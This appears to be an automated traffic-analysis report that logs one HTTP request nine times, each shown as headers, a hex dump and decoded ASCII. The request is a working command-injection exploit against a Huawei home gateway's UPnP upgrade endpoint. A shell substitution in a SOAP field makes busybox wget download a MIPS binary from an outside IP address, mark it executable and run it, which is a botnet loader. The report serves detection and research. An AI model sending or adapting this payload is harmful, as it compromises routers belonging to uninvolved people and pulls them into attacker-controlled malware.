Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
